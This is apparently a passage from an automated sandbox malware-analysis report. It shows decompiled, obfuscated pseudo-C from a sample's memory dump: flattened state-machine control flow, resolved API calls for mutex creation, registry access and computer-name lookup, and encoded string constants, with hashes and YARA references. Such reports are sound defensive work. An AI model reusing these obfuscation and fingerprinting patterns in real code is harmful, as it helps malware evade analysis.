								if(_t5 == 0x2f3e82e) {
									r8d = 0x12cfae43;
									r9d = 0x96;
									E00A1FAD7(1, _t21, _t29, _t33);
									RtlAllocateHeap(??, ??, ??); // executed
									_t33 = _t29;
									E00A1C8BC(0, _t29, _t29, _t36, _t40);
									_t5 = 0xe8f2ad3b;
								}
							}
						}
						continue;
					}
					if(_t5 == 0x4eab221f) {
						return _t5;
					}
					if(_t5 == 0x534cbae1) {
						_t5 = _t23;
					} else {
						if(_t5 == 0x79212036) {
							_t5 = 0x4eab221f;
						}
					}
				}
			}










                                                                                                                                                        0x00a1cdb9
                                                                                                                                                        0x00a1cdc3
                                                                                                                                                        0x00a1cdd1
                                                                                                                                                        0x00a1cdd4
                                                                                                                                                        0x00a1cdd9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1cddf
                                                                                                                                                        0x00a1cde4
                                                                                                                                                        0x00a1cdeb
                                                                                                                                                        0x00a1ce57
                                                                                                                                                        0x00a1cded
                                                                                                                                                        0x00a1cdf2
                                                                                                                                                        0x00a1ce6b
                                                                                                                                                        0x00a1ce71
                                                                                                                                                        0x00a1ce77
                                                                                                                                                        0x00a1ce7c
                                                                                                                                                        0x00a1ce7e
                                                                                                                                                        0x00a1ce8e
                                                                                                                                                        0x00a1cdf4
                                                                                                                                                        0x00a1cdf9
                                                                                                                                                        0x00a1ce07
                                                                                                                                                        0x00a1ce0d
                                                                                                                                                        0x00a1ce13
                                                                                                                                                        0x00a1ce20
                                                                                                                                                        0x00a1ce25
                                                                                                                                                        0x00a1ce2d
                                                                                                                                                        0x00a1ce32
                                                                                                                                                        0x00a1ce32
                                                                                                                                                        0x00a1cdf9
                                                                                                                                                        0x00a1cdf2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1cdeb
                                                                                                                                                        0x00a1ce3e
                                                                                                                                                        0x00a1cead
                                                                                                                                                        0x00a1cead
                                                                                                                                                        0x00a1ce45
                                                                                                                                                        0x00a1ce99
                                                                                                                                                        0x00a1ce47
                                                                                                                                                        0x00a1ce4c
                                                                                                                                                        0x00a1ce4e
                                                                                                                                                        0x00a1ce53
                                                                                                                                                        0x00a1ce4c
                                                                                                                                                        0x00a1ce45

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00A20A77), ref: 00A1CE20
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID: 6 !y$6 !y
                                                                                                                                                        • API String ID: 1279760036-2075727267
                                                                                                                                                        • Opcode ID: ace1e1f7354e43219aaef62e33cf0548d855f00e3c2b989caf3d60ba01407e6d
                                                                                                                                                        • Instruction ID: ed59a4a786caaf29ac66b626133757aa6def2c6198d01d3091587807c846dcf7
                                                                                                                                                        • Opcode Fuzzy Hash: ace1e1f7354e43219aaef62e33cf0548d855f00e3c2b989caf3d60ba01407e6d
                                                                                                                                                        • Instruction Fuzzy Hash: A5117A217C55884DEB38265A78407BE4C424B98BF8F284939AF0DDBB81D929CDD28308
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00A13A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00A13A22(long long __rax, intOrPtr __rcx, long long* __rdx) {
				long long _v32;
				intOrPtr _v36;
				signed char _t12;
				void* _t18;
				void* _t26;
				long long _t31;
				long long* _t36;

				_t32 = __rcx;
				_t31 = __rax;
				_t36 = __rdx;
				r8d = 0x7ae3257e;
				r9d = 0x42;
				E00A1FAD7(1, _t26, __rax, __rcx);
				 *_t31(); // executed
				_v32 = _t31;
				r8d = 0xce1f1c4e;
				r9d = 0xc5;
				E00A1FAD7(1, _t26, _t31, __rcx);
				_v36 =  *_t31();
				_t18 = 0x953bce87;
				L1:
				while(_t18 > 0x346ca2b9) {
					if(_t18 == 0x346ca2ba) {
						r8d = 0x2db58ff7;
						r9d = 0x11;
						E00A1FAD7(1, _t26, _t31, _t32);
						_t32 = _v32;
						 *_t31();
						_t18 = 0x6b45cfdb;
						_t12 = 1;
						continue;
					}
					if(_t18 != 0x6b45cfdb) {
						continue;
					}
					return _t12 & 0x00000001;
				}
				if(_t18 == 0x953bce87) {
					_t18 =  ==  ? 0x346ca2ba : 0x263eb76d;
				} else {
					if(_t18 == 0x263eb76d) {
						_t31 = _v32;
						 *_t36 = _t31;
						_t18 = 0x6b45cfdb;
						_t12 = 0;
					}
				}
				goto L1;
			}










                                                                                                                                                        0x00a13a22
                                                                                                                                                        0x00a13a22
                                                                                                                                                        0x00a13a29
                                                                                                                                                        0x00a13a36
                                                                                                                                                        0x00a13a3c
                                                                                                                                                        0x00a13a42
                                                                                                                                                        0x00a13a4e
                                                                                                                                                        0x00a13a50
                                                                                                                                                        0x00a13a5c
                                                                                                                                                        0x00a13a62
                                                                                                                                                        0x00a13a68
                                                                                                                                                        0x00a13a6f
                                                                                                                                                        0x00a13a73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a13a7d
                                                                                                                                                        0x00a13aac
                                                                                                                                                        0x00a13ad8
                                                                                                                                                        0x00a13ade
                                                                                                                                                        0x00a13ae4
                                                                                                                                                        0x00a13ae9
                                                                                                                                                        0x00a13aec
                                                                                                                                                        0x00a13aee
                                                                                                                                                        0x00a13af3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a13af3
                                                                                                                                                        0x00a13ab4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a13b00
                                                                                                                                                        0x00a13b00
                                                                                                                                                        0x00a13a8b
                                                                                                                                                        0x00a13ac7
                                                                                                                                                        0x00a13a8d
                                                                                                                                                        0x00a13a93
                                                                                                                                                        0x00a13a95
                                                                                                                                                        0x00a13a9a
                                                                                                                                                        0x00a13a9d
                                                                                                                                                        0x00a13aa2
                                                                                                                                                        0x00a13aa2
                                                                                                                                                        0x00a13a93
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,00A209DE), ref: 00A13A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                        • String ID: ~%z
                                                                                                                                                        • API String ID: 1964310414-678350322
                                                                                                                                                        • Opcode ID: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction ID: 92132399453ac228156af229f051101aeab8448be523da4cd84e953127e56b14
                                                                                                                                                        • Opcode Fuzzy Hash: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction Fuzzy Hash: 8611273331858046DF3C0E1569A1ABD26928F987D8F18013DE98F9BF95C81F8AC24702
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00A17B43, Relevance: 1.7, APIs: 1, Instructions: 213registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                        			E00A17B43(intOrPtr __edx, long long __rax, void* __rcx) {
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v112;
				signed long long _v120;
				long long _v128;
				long long _v136;
				intOrPtr _v140;
				long long _v152;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v181;
				long long _v192;
				long long _v200;
				void* _t69;
				intOrPtr _t108;
				long long _t115;
				signed long long _t123;
				intOrPtr* _t131;
				void* _t140;
				void* _t144;
				void* _t146;
				signed long long _t147;
				long long _t148;

				_t115 = __rax;
				_t144 =  &_v168;
				_t108 = __edx;
				_t140 = __rcx;
				E00A1CDB9(0xc8, __rax);
				_v152 = _t115;
				_t131 =  &_v180;
				_v136 = _t131;
				 *_t131 = 0;
				_v128 =  &_v160;
				_v88 = _t140 + 0xb44;
				_v96 = _t140 + 0x294;
				_v104 = _t140 + 0x280;
				_v140 = _t108;
				r12d = 0xf11b687f;
				r12d =  ==  ? 0xf83e1c76 : r12d;
				r15d = 0x5c7553b0;
				r15d =  ==  ? 0xdab00bc5 : r15d;
				_t15 = _t140 + 0x5d2; // 0x5c755982
				_v112 = _t15;
				_t17 = _t140 + 0x650; // 0x5c755a00
				_t123 = _t17;
				_v120 = _t123;
				_t69 = 0xbda386ba;
				L1:
				while(1) {
					while(_t69 > 0xdab00bc4) {
						if(_t69 <= 0xf83e1c75) {
							if(_t69 == 0xdab00bc5) {
								 *((short*)(_t140 + 0x294)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x664));
								_t69 = 0x5c7553b0;
								_t147 = _v104;
								_t148 = _v96;
								continue;
							}
							if(_t69 == 0xe6671123) {
								_t69 =  !=  ? 0x9491a652 : 0x1c0ab71e;
								continue;
							}
							if(_t69 != 0xf11b687f) {
								continue;
							}
							L29:
							_t69 = 0xd22e7491;
							continue;
						}
						if(_t69 > 0x38db78b6) {
							if(_t69 == 0x38db78b7) {
								r13d = 0;
								r14d = 0;
								_t69 = r15d;
								continue;
							}
							if(_t69 != 0x5c7553b0) {
								continue;
							}
							_v80 = _t147;
							_v72 = _t148;
							_v176 = 0;
							_v172 = 0x4cf804b1;
							_v168 = 0x5dec0a95;
							_v164 = 0x38ed4ebe;
							if(_v176 != 0) {
								L25:
								E00A2020E(_t123, _v152,  &_v172, _v88, _t146);
								r8d = 0x6e0c8ed2;
								r9d = 0xd6;
								E00A1FAD7(2, _t108, _t123, _v152);
								_t41 =  &_v160; // 0xf11b68c7
								_v200 = _t41;
								r8d = 0;
								r9d = 0x20019; // executed
								RegOpenKeyExA(??, ??, ??, ??, ??); // executed
								_t131 = _v152;
								E00A1CC2E(_t123, _t131);
								_t69 =  ==  ? 0xc40b2334 : 0xbedb4fc6;
								continue;
							}
							do {
								 *(_t144 + 0x38 + _t123 * 4) = ( *(_t144 + 0x38 + _t123 * 4) & 0xfeab8f08 |  !( *(_t144 + 0x38 + _t123 * 4)) & 0x015470f7) ^ 0x39ca1b15;
								_t131 = _t131 + 1;
								_t123 = _t123 + 1;
							} while (_t123 != 4);
							goto L25;
						} else {
							if(_t69 == 0xf83e1c76) {
								 *((intOrPtr*)(_t140 + 0x664)) = _v180;
								_t69 = 0xf11b687f;
							} else {
								if(_t69 == 0x1c0ab71e) {
									_t69 = r12d;
								}
							}
							continue;
						}
					}
					if(_t69 <= 0xbda386b9) {
						if(_t69 == 0x8f6e5d8a) {
							goto L29;
						}
						if(_t69 == 0x9491a652) {
							 *((intOrPtr*)(_t140 + 0x638)) = _v180;
							_t69 = 0xf11b687f;
						} else {
							if(_t69 == 0xa8bc8896) {
								 *((short*)(_t140 + 0x5d2)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x638));
								_t69 = 0x5c7553b0;
								_t147 = _v120;
								_t148 = _v112;
							}
						}
						continue;
					}
					if(_t69 > 0xc40b2333) {
						if(_t69 == 0xc40b2334) {
							r8d = 0xbdd87e1e;
							r9d = 0xde;
							E00A1FAD7(2, _t108, _t123, _t131);
							_t60 =  &_v180; // 0xf11b68b3
							_v192 = _t60;
							_v200 = _v72;
							r8d = 0;
							r9d = 0;
							 *_t123();
							r8d = 0x96bc22d6;
							r9d = 0xe0;
							E00A1FAD7(2, _t108, _t123, _v160);
							_t131 = _v160;
							 *_t123();
							_t69 =  ==  ? 0xe6671123 : 0x8f6e5d8a;
							continue;
						}
						if(_t69 != 0xd22e7491) {
							continue;
						}
						return _t69;
					}
					if(_t69 == 0xbda386ba) {
						_v181 = _v140 == 1;
						_t69 =  !=  ? 0xa8bc8896 : 0x38db78b7;
						continue;
					}
					if(_t69 != 0xbedb4fc6) {
						continue;
					}
					goto L29;
				}
			}

































                                                                                                                                                        0x00a17b43
                                                                                                                                                        0x00a17b4f
                                                                                                                                                        0x00a17b56
                                                                                                                                                        0x00a17b58
                                                                                                                                                        0x00a17b60
                                                                                                                                                        0x00a17b65
                                                                                                                                                        0x00a17b6a
                                                                                                                                                        0x00a17b6f
                                                                                                                                                        0x00a17b79
                                                                                                                                                        0x00a17b84
                                                                                                                                                        0x00a17b95
                                                                                                                                                        0x00a17ba4
                                                                                                                                                        0x00a17bb3
                                                                                                                                                        0x00a17bbb
                                                                                                                                                        0x00a17bc7
                                                                                                                                                        0x00a17bcd
                                                                                                                                                        0x00a17bd6
                                                                                                                                                        0x00a17bdc
                                                                                                                                                        0x00a17be0
                                                                                                                                                        0x00a17be7
                                                                                                                                                        0x00a17bec
                                                                                                                                                        0x00a17bec
                                                                                                                                                        0x00a17bf3
                                                                                                                                                        0x00a17bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17bfd
                                                                                                                                                        0x00a17bfd
                                                                                                                                                        0x00a17c09
                                                                                                                                                        0x00a17c5b
                                                                                                                                                        0x00a17e0b
                                                                                                                                                        0x00a17e1a
                                                                                                                                                        0x00a17e1e
                                                                                                                                                        0x00a17e23
                                                                                                                                                        0x00a17e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17e2b
                                                                                                                                                        0x00a17c66
                                                                                                                                                        0x00a17e47
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17e47
                                                                                                                                                        0x00a17c71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17dcc
                                                                                                                                                        0x00a17dcc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17dcc
                                                                                                                                                        0x00a17c10
                                                                                                                                                        0x00a17cc5
                                                                                                                                                        0x00a17e63
                                                                                                                                                        0x00a17e66
                                                                                                                                                        0x00a17e69
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17e69
                                                                                                                                                        0x00a17cd0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17cd6
                                                                                                                                                        0x00a17cde
                                                                                                                                                        0x00a17ce8
                                                                                                                                                        0x00a17cec
                                                                                                                                                        0x00a17cf4
                                                                                                                                                        0x00a17cfc
                                                                                                                                                        0x00a17d08
                                                                                                                                                        0x00a17d3d
                                                                                                                                                        0x00a17d4f
                                                                                                                                                        0x00a17d60
                                                                                                                                                        0x00a17d66
                                                                                                                                                        0x00a17d6c
                                                                                                                                                        0x00a17d71
                                                                                                                                                        0x00a17d76
                                                                                                                                                        0x00a17d85
                                                                                                                                                        0x00a17d88
                                                                                                                                                        0x00a17d8e
                                                                                                                                                        0x00a17d93
                                                                                                                                                        0x00a17d98
                                                                                                                                                        0x00a17da9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17da9
                                                                                                                                                        0x00a17d11
                                                                                                                                                        0x00a17d2d
                                                                                                                                                        0x00a17d31
                                                                                                                                                        0x00a17d34
                                                                                                                                                        0x00a17d37
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17c16
                                                                                                                                                        0x00a17c1b
                                                                                                                                                        0x00a17dda
                                                                                                                                                        0x00a17de0
                                                                                                                                                        0x00a17c21
                                                                                                                                                        0x00a17c26
                                                                                                                                                        0x00a17c28
                                                                                                                                                        0x00a17c28
                                                                                                                                                        0x00a17c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17c1b
                                                                                                                                                        0x00a17c10
                                                                                                                                                        0x00a17c32
                                                                                                                                                        0x00a17c7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17c88
                                                                                                                                                        0x00a17e53
                                                                                                                                                        0x00a17e59
                                                                                                                                                        0x00a17c8e
                                                                                                                                                        0x00a17c93
                                                                                                                                                        0x00a17c99
                                                                                                                                                        0x00a17ca8
                                                                                                                                                        0x00a17cac
                                                                                                                                                        0x00a17cb1
                                                                                                                                                        0x00a17cb6
                                                                                                                                                        0x00a17cb6
                                                                                                                                                        0x00a17c93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17c88
                                                                                                                                                        0x00a17c39
                                                                                                                                                        0x00a17db6
                                                                                                                                                        0x00a17e8d
                                                                                                                                                        0x00a17e93
                                                                                                                                                        0x00a17e99
                                                                                                                                                        0x00a17e9e
                                                                                                                                                        0x00a17ea3
                                                                                                                                                        0x00a17ea8
                                                                                                                                                        0x00a17eb3
                                                                                                                                                        0x00a17eb6
                                                                                                                                                        0x00a17eb9
                                                                                                                                                        0x00a17eca
                                                                                                                                                        0x00a17ed0
                                                                                                                                                        0x00a17ed6
                                                                                                                                                        0x00a17edb
                                                                                                                                                        0x00a17ede
                                                                                                                                                        0x00a17eec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17eec
                                                                                                                                                        0x00a17dc1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17f11
                                                                                                                                                        0x00a17f11
                                                                                                                                                        0x00a17c44
                                                                                                                                                        0x00a17def
                                                                                                                                                        0x00a17e03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17e03
                                                                                                                                                        0x00a17c4f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17c51

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A1CDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00A20A77), ref: 00A1CE20
                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,D179479F,A4EA36C8,00000000,?), ref: 00A17D8E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeapOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4287083251-0
                                                                                                                                                        • Opcode ID: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction ID: dcec13be6fafbb72ce21ec73fb1a5e65531283e52ed04b9415528ebde579491e
                                                                                                                                                        • Opcode Fuzzy Hash: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction Fuzzy Hash: 2281F67231D6848ADB64CB19E59079EB6B0F788B94F545016EB9EC7B58DF38C8D08F01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00A1D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                        			E00A1D1C4(intOrPtr __rcx, intOrPtr __rdx) {
				char _v68;
				char _v72;
				void* _v80;
				long long _v88;
				void* _v96;
				signed long long _v104;
				void* _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				char _v129;
				void* _t47;
				void* _t81;
				signed long long _t88;
				long long* _t90;
				intOrPtr* _t94;
				signed long long _t96;
				intOrPtr _t106;
				signed long long* _t108;
				intOrPtr _t110;
				long long _t111;
				long long _t112;
				long long _t113;

				_t108 =  &_v104;
				_t110 = __rdx;
				_t106 = __rcx;
				_t94 =  &_v68;
				_v96 = _t94;
				_t88 = _v96;
				 *_t94 = 0x14;
				r13d = 0;
				r8d = 0x913338ad;
				r9d = 0x74;
				E00A1FAD7(1, _t81, _t88, __rcx);
				_t98 = __rcx;
				GetComputerNameA(??, ??); // executed
				_v129 =  *((intOrPtr*)(__rcx));
				_t96 =  &_v128 | _t88;
				_t47 = 0x72f0bc31;
				_t112 =  &_v72;
				_t113 =  &_v112;
				L1:
				while(_t47 > 0x31a4f3ac) {
					if(_t47 > 0x368c7021) {
						if(_t47 == 0x368c7022) {
							_v88 = _t112;
							_v80 = _t113;
							_t90 = _v80;
							_v112 = _t111;
							r8d = 0x8ece2d00;
							r9d = 0x209;
							E00A1FAD7(0xa, _t81, _t90, _t98);
							 *_t90(); // executed
							_t88 = _v112;
							_v104 = _t88;
							_t47 =  ==  ? 0x31a4f3ad : 0x2d657e6;
						} else {
							if(_t47 == 0x72f0bc31) {
								_t47 =  ==  ? 0x900af59d : 0x368c7022;
							}
						}
						continue;
					}
					if(_t47 == 0x31a4f3ad) {
						_v128 = r13b;
						_v124 = 0x21a85fec;
						_v120 = 0x73bf45ed;
						if(_v128 != r13b) {
							L16:
							_t98 = _t110;
							r8d = 8;
							E00A1C96E(_t47, _t110, _t96);
							_t47 = 0x134a0c57;
							continue;
						}
						do {
							 *(_t108 + 0x2c + _t88 * 4) =  *(_t108 + 0x2c + _t88 * 4) & 0x8c10ef5d |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x73ef10a2;
							_t47 = 1;
						} while (_t88 == 0);
						goto L16;
					} else {
						if(_t47 == 0x31fa4db0) {
							E00A1C3D4(_v104, _t110);
							r8d = 0xd4d62162;
							r9d = 0x208;
							E00A1FAD7(0xa, _t81, _t88, _v104);
							_t98 = _v112;
							 *_t88();
							_t47 = 0x134a0c57;
						}
						continue;
					}
				}
				if(_t47 == 0x900af59d) {
					_v128 = r13b;
					_v124 = 0x73bca5c0;
					_v120 = 0x32f8abda;
					if(_v128 != r13b) {
						L20:
						_t98 = _t106;
						r8d = 7;
						E00A1C96E(_t47, _t106, _t96);
						_t47 = 0x368c7022;
						goto L1;
					}
					do {
						 *(_t108 + 0x2c + _t88 * 4) = ( *(_t108 + 0x2c + _t88 * 4) & 0x9ec2c1cc |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x613d3e33) ^ 0x53c5d4bd;
						_t47 = 1;
					} while (_t88 == 0);
					goto L20;
				}
				if(_t47 == 0x2d657e6) {
					_t88 = _v104;
					_t47 =  ==  ? 0x31a4f3ad : 0x31fa4db0;
					goto L1;
				}
				if(_t47 != 0x134a0c57) {
					goto L1;
				}
				return _t47;
			}


























                                                                                                                                                        0x00a1d1d0
                                                                                                                                                        0x00a1d1d4
                                                                                                                                                        0x00a1d1d7
                                                                                                                                                        0x00a1d1da
                                                                                                                                                        0x00a1d1df
                                                                                                                                                        0x00a1d1e4
                                                                                                                                                        0x00a1d1e9
                                                                                                                                                        0x00a1d1ef
                                                                                                                                                        0x00a1d1f9
                                                                                                                                                        0x00a1d1ff
                                                                                                                                                        0x00a1d205
                                                                                                                                                        0x00a1d20a
                                                                                                                                                        0x00a1d210
                                                                                                                                                        0x00a1d214
                                                                                                                                                        0x00a1d222
                                                                                                                                                        0x00a1d225
                                                                                                                                                        0x00a1d22f
                                                                                                                                                        0x00a1d234
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d239
                                                                                                                                                        0x00a1d245
                                                                                                                                                        0x00a1d2b6
                                                                                                                                                        0x00a1d3b4
                                                                                                                                                        0x00a1d3be
                                                                                                                                                        0x00a1d3c3
                                                                                                                                                        0x00a1d3c8
                                                                                                                                                        0x00a1d3d4
                                                                                                                                                        0x00a1d3da
                                                                                                                                                        0x00a1d3e0
                                                                                                                                                        0x00a1d3ed
                                                                                                                                                        0x00a1d3ef
                                                                                                                                                        0x00a1d3f4
                                                                                                                                                        0x00a1d403
                                                                                                                                                        0x00a1d2bc
                                                                                                                                                        0x00a1d2c1
                                                                                                                                                        0x00a1d2d6
                                                                                                                                                        0x00a1d2d6
                                                                                                                                                        0x00a1d2c1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d2b6
                                                                                                                                                        0x00a1d24c
                                                                                                                                                        0x00a1d2de
                                                                                                                                                        0x00a1d2e3
                                                                                                                                                        0x00a1d2eb
                                                                                                                                                        0x00a1d2f8
                                                                                                                                                        0x00a1d320
                                                                                                                                                        0x00a1d320
                                                                                                                                                        0x00a1d326
                                                                                                                                                        0x00a1d32c
                                                                                                                                                        0x00a1d331
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d331
                                                                                                                                                        0x00a1d2fc
                                                                                                                                                        0x00a1d312
                                                                                                                                                        0x00a1d319
                                                                                                                                                        0x00a1d319
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d252
                                                                                                                                                        0x00a1d257
                                                                                                                                                        0x00a1d261
                                                                                                                                                        0x00a1d272
                                                                                                                                                        0x00a1d278
                                                                                                                                                        0x00a1d27e
                                                                                                                                                        0x00a1d283
                                                                                                                                                        0x00a1d286
                                                                                                                                                        0x00a1d288
                                                                                                                                                        0x00a1d288
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d257
                                                                                                                                                        0x00a1d24c
                                                                                                                                                        0x00a1d294
                                                                                                                                                        0x00a1d33b
                                                                                                                                                        0x00a1d340
                                                                                                                                                        0x00a1d348
                                                                                                                                                        0x00a1d355
                                                                                                                                                        0x00a1d383
                                                                                                                                                        0x00a1d383
                                                                                                                                                        0x00a1d389
                                                                                                                                                        0x00a1d38f
                                                                                                                                                        0x00a1d394
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d394
                                                                                                                                                        0x00a1d359
                                                                                                                                                        0x00a1d375
                                                                                                                                                        0x00a1d37c
                                                                                                                                                        0x00a1d37c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d359
                                                                                                                                                        0x00a1d29f
                                                                                                                                                        0x00a1d39e
                                                                                                                                                        0x00a1d3ac
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d3ac
                                                                                                                                                        0x00a1d2aa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1d42a

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                        • Opcode ID: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction ID: c4ca3453e73ec3a20edfc002033e498553b23b1a7f0007f5f6cbf76392608fb8
                                                                                                                                                        • Opcode Fuzzy Hash: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction Fuzzy Hash: 8C51093630868486CA248B5AF45469FBB60F389794F58411AFF9E87B68CB3DC8C5DB05
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00A1C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 15%
                                                                                                                                                        			E00A1C450(signed long long __rax, long long __rcx) {
				char _v52;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				int _t23;
				void* _t39;
				signed long long _t44;
				char* _t46;
				intOrPtr* _t47;
				long long _t48;
				void* _t49;

				_t44 = __rax;
				_t48 = __rcx;
				r8d = 0xe249a58d;
				r9d = 0xac;
				E00A1FAD7(1, _t39, __rax, __rcx);
				_t46 =  &_v72;
				 *_t44();
				_t47 =  &_v52;
				 *((char*)(_t47 - 4)) = 0;
				 *_t47 = 0x32816739;
				 *((intOrPtr*)(_t47 + 4)) = 0x32816739;
				 *((intOrPtr*)(_t47 + 8)) = 0x32b5676d;
				 *((intOrPtr*)(_t47 + 0xc)) = 0x32d5670d;
				 *((intOrPtr*)(_t47 + 0x10)) = 0x329c6724;
				 *((intOrPtr*)(_t47 + 0x14)) = 0x32f86740;
				if( *((intOrPtr*)(_t47 - 4)) == 0) {
					do {
						 *(_t49 + 0x40 + _t44 * 4) =  *(_t49 + 0x40 + _t44 * 4) & 0xcd0798bf |  !( *(_t49 + 0x40 + _t44 * 4)) & 0x32f86740;
						_t46 = _t46 + 1;
						_t44 = _t44 + 1;
					} while (_t44 != 7);
				}
				r8d = 0xc87545f4;
				r9d = 0xcc;
				E00A1FAD7(1, _t39, _t44, _t46);
				_v88 = _t48;
				_v80 = 0xc;
